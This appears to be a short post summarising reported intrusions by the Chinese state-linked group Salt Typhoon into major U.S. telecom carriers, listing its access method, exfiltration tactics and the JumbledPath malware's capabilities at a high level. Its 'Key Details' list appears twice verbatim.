The Chinese state-sponsored hacking group Salt Typhoon (aka Earth Estries, GhostEmperor, UNC2286) infiltrated major U.S. telecom providers, including Verizon, AT&T, Lumen Technologies, and T-Mobile. Using stolen credentials and custom malware named JumbledPath, the group monitored network traffic and stole sensitive data, including government communications and wiretapping requests.
🔍 Key Details:
Access Method: Stolen credentials; only one known exploitation (Cisco CVE-2018-0171).
Persistence: Extracted credentials, intercepted SNMP, TACACS, RADIUS traffic, and used TFTP/FTP for exfiltration.
JumbledPath: Go-based ELF binary targeting Linux devices, enabling stealthy packet capture, disabling logs, and erasing traces.
Network Manipulation: Modified configs, enabled Guest Shell, altered ACLs, and created hidden accounts.
🔍 Key Details:
Access Method: Stolen credentials; only one known exploitation (Cisco CVE-2018-0171).
Persistence: Extracted credentials, intercepted SNMP, TACACS, RADIUS traffic, and used TFTP/FTP for exfiltration.
JumbledPath: Go-based ELF binary targeting Linux devices, enabling stealthy packet capture, disabling logs, and erasing traces.
Network Manipulation: Modified configs, enabled Guest Shell, altered ACLs, and created hidden accounts.
![[Image: MxgnhgZ.gif]](https://i.imgur.com/MxgnhgZ.gif)